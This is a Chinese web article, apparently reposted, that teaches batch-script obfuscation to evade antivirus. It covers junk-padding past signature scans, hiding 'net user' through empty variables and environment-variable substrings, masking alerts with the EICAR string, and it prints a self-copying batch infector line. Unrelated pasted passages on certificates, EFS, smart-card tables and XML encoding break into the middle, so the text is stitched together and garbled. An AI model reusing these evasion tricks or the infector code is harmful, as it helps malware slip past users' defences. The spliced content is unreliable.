关于bat加密的原理!?

| ls /

|

编写完保存后，将文件拿到WINDOWS下来用记事本打开，接着在后面加上一条net user命令

例如:| #!/bin/bash

ls /

(这是WINDOWS读取在LINXU编写文件后的内容，不要修改!)

| net user

保存好后,直接在WINDOWS下执行,这样在执行到net user时就会正确执行了,

在linux下用bash lin.bat执行后,执行到net user 时就会退出了!!

2.批处理脚本的加密解密

可以使用一些凯撒密码，移位加密等加密手段的思想，写一段加密算法，然后将脚本代码进行加密，然后base4，rot3这样的 特征码就会消失，或者可以不那么麻烦，直接用自制的加密算法加密特征码，然后再使用的时候将其解密就行了。一般的公钥不会用明文传输给别人的,正常情况下都会生成一个文件,这个文件就是公钥文件,然后这个文件可以交给其他人用于加密,但是传输过程中如果有人恶意破坏,将你的公钥换成了他的公钥,然后得到公钥的一方加密数据,不是他就可以用他自己的密钥解密看到数据了吗,为了解决这个问题,需要一个公证方来做这个事,任何人都可以找它来确认公钥是谁发的.这就是ca,ca确认公钥的原理也很简单,它将它自己的公钥发布给所有人,然后一个想要发布自己公钥的人可以将自己的公钥和一些身份信息发给ca,ca用自己的密钥进行加密,这里也可以称为签名.然后这个包含了你的公钥和你的信息的文件就可以称为证书文件了.这样一来所有得到一些公钥文件的人,通过ca的公钥解密了文件,如果正常解密那么机密后里面的信息一定是真的,因为加密方只可能是ca,其他人没它的密钥啊.这样你解开公钥文件,看看里面的信息就知道这个是不是那个你需要用来加密的公钥了.。可以看出，efs加密实际形成了fek加密文件数据—公钥加密fek—主密钥加密私钥—用户密码加密主密钥的加密链cmd加密，要想解密文件，必需获得用户密码，解密主密钥，用主密钥解密私钥，用私钥解密fek，用fek解密文件数据。

我今天教大叫其他一个简单的方法,直接将以下内容复制到一个空文文件里

%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a 
@echo off
net user
net start

命令部分随便输入,但是命令后面不要有空格

破解方法:直接在cmd下用edit打开或者用word打开

原理:

4 附录 a sam 卡片中的基本数据文件表 a-1 sam 卡片公共信息文件 文件标识（sfi） 文件类型 文件大小 文件存取控制 字节 1~10 11 12 13 14 读=自由 数据元 sam 卡序列号 sam 卡版本号 密钥卡类型 指令集版本 发卡方自定义 fci 数据 21（十进制） 透明 14 改写=需要安全信息 长度 10 1 1 1 1表 a-2 sam 的终端信息文件 文件标识（sfi） 文件类型 文件大小 文件存取控制 字节 读=自由 数据元 22（十进制） 透明 6 改写=需要安全信息 长度终端机编号（1 字节省编 6 1~6 码+1 字节市编码+1 字节 发卡机构编码 +3 字节序 列号）。但是，如果你明显的指定一个编码类型，并且成功使用了编码：这时它会忽略任何它在文档中发现的编码类型。 但是，如果你明显的指定一个编码类型， 并且成功使用了编码：这时它会忽略任何它在文档中发现的编码类型。

提供了对doc/ppt/txt/asp/html等文档进行智能字符批量替换(支持正则，word通配符)，对txt文本行的添加、删除、提取、统计分割等的处理，对doc/txt类型互转，对xls表合并 ，对ppt转word，office文档密码筛查， txt文本合并/编码类型检测，文件摘要的显示与改写， 批量随机数的产生，41种特定的txt批量处理功能cmd加密，文件批量复制搜索(支持文件/文件夹，网上邻居，可复制、移动、删除、更名等)，图像仿photoshop综合处理功能，文件时间属性修改，数码照片视频等的拍摄日期的更改等功能。同义词 近义词 停用词2 文本特征抽取抽取代表文本特征的特征项，这些特征可以用结构化的形 式保存，作为文档的中间表示形式。当作gb2312编码时就是原来写文档时的中文字符了, 当把写入的文档在记事本打开时, 由于没有utf-8标记字节0xef 0xbb 0xbf(tinyxml默认不写入这三个字节, 稍后再说怎么让它写入), 所以记事本把xml文件当作gb2312编码打开, 就阴差阳错地把原本错误的字节以正确的中文字符显示了, 但终究这篇xml文档是utf-8编码的, 那些中文字符本应显示为乱码的, 就这样错误的写入, 错误的读取, 记事本错误的判断, 都加到一起就离奇地没有错误了.。

3.加入欺骗代码

骗代码就是其他一些病毒的特征码,加到我们自己的程序中来,让杀毒软件报错病毒型号,达到欺骗用户的目录

我们可以在BAT中加入EICAR测试文件

他是来自EICAR的一个com文件(有兴趣的朋友可以到Intended use 째 EICAR去看看),他是用来测试反病毒软件的杀毒能力的一个测试文件.

我们将EICAR加入BAT中后,BAT就会提示报毒,但是病毒类型是EICAR,这样反病毒软件的提示并不会引起人们的注意.

下面是EICAR测试文件的内容:

[]X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*[]

BAT病毒代码(假设)

[]for %%a in (*.bat) do copy %0 %%a[]

(由于上面代码报毒,加了两符号,防止小组错把文本杀掉...)

4.代码中插入圾伪代码

什么是"垃圾伪代码"?垃圾伪代码就是写在有效代码中间,但是在运行的时候没有任何作用的代码.

BAT中如何实现这一功能呢?很简单,我们只需要用set定义一个空变量就可以了

例如:

@echo off
set snj=
%snj%n%snj%%snj%%snj%e%snj%%snj%%snj%t%snj%%snj%%snj% %snj%%snj%%snj%u%snj%se%snj%%snj%%snj%%snj%r%snj%%snj%%snj%

看完上面的代码你知道我写的BAT内容是什么吗??

其实就是net user

5.BAT的免查杀

BAT的免查杀非常简单,一般杀毒软件对BAT的查杀只是检查一下前1000 Byte,看有没有特征码!

因为我们的BAT能忽略简单的错误,所以我们可以在前面胡乱加入一些命令,1000 Byte左右,这样就能免查杀了.

不过有时后这种方法不灵,那我们就得用到,代码中插入圾伪代码这个技巧了.

我演示一下!

6.综合利用

%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a 
cls
@%ComSpec:~-1,1%%USERPROFILE:~5,1%h%HOMEPATH:~2,1%   off
%windir:~-1,1%%ComSpec:~-1,1%%tmp:~-4,1% snj=
%ALLUSERSPROFILE:~11,1%%snj%%ALLUSERSPROFILE:~8,1%%snj%t love=23nw)svt(05454s756efgdf%snj%54.4566gfr6z6
%windir:~-1,1%%ComSpec:~-1,1%%tmp:~-4,1% love=%love:v=e%
%ALLUSERSPROFILE:~11,1%%snj%%ALLUSERSPROFILE:~8,1%t love=%love:(=u%
%ALLUSERSPROFILE:~11,1%%ALLUSERSPROFILE:~8,1%t gad=%love:~2,1%%love:~6,1%%love:~-29,1%
%snj%%gad%%snj% %snj%%snj%us%love:~6,1%%love:~-4,1%%snj%%

大家一眼看不出这是什么命令了吧,其实这就是一条net user

利用了"代码中插入圾伪代码" 与 "批处理脚本的加密"

这个加密方法是读取系统变量值中指定的字母的方法

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/ruanjian/article-108166-1.html